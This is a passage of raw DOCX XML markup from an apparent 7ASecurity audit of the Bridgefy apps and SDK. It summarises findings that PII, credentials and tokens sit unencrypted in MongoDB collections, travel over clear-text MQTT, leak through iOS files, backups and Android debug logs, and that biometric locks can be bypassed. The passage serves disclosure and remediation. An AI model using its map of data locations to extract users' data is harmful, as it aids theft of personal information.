      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q4: Is sensitive PII insecurely stored or easily retrievable from the apps, SDK or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>servers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The security review of the Bridgefy web app, mobile apps, and SDK comprehensively proves that sensitive PII was not sufficiently protected:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="372" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The following information was found to be unencrypted in the MongoDB: MQTT credentials, Access and FCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tokens,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>userId,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>phone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>number,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>alias,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>displayName, avatar, messages metadata (messageId, to, from, status, readedAt, receivedAt, etc.),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>profiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(email,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>firstName,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>etc.)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>collections:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="1440" w:right="2412" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-staging.mqttauthentications </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(password) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-staging.users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(displayName,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>alias,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>phone,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>etc.) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-staging.clientprofiles </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(email, firstName, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>userId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(sender and receiver in the topic), Firebase access token (user_id, phone number, name, etc.), and metadata for direct messages (senderFirebaseId, receiverFirebaseId, receiverNickname, receiverAvatar, receiverName, senderNickname, senderName, and senderAvatar)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to be sent to the MQTT broker using clear-text MQTT traffic (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Those tokens could be used to get information about the user through the APP API (profile, contact list, etc.) as shown in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-037</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-040</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="363" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The fingerprint/biometric protection features were found to be bypassable on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-036</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Credentials, Firebase access tokens (user_id, phone number, name, etc.), FCM tokens, and PII could be leaked to attackers with physical access to an iOS device due to failure to leverage the appropriate iOS file system protection features (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-037</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), as well as through iOS backups (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-040</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1440" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Library/Caches/com.bridgefy.BridgefyNewStaging/Cache.db </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Library/Application Support/CoreData.sqlite-wal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Library/Preferences/com.bridgefy.BridgefyNewStaging.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fields such as phone number, verification code, pushToken, MQTT subscribed topics, contact list, etc. could be leaked to attackers with physical access to an Android device through debug messages (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) ,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="371" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>User PII, the Firebase access token (user_id, phone number, name, etc.), and FCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>unencrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>rest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>device </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-031</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1440" w:right="2754" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected Files: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
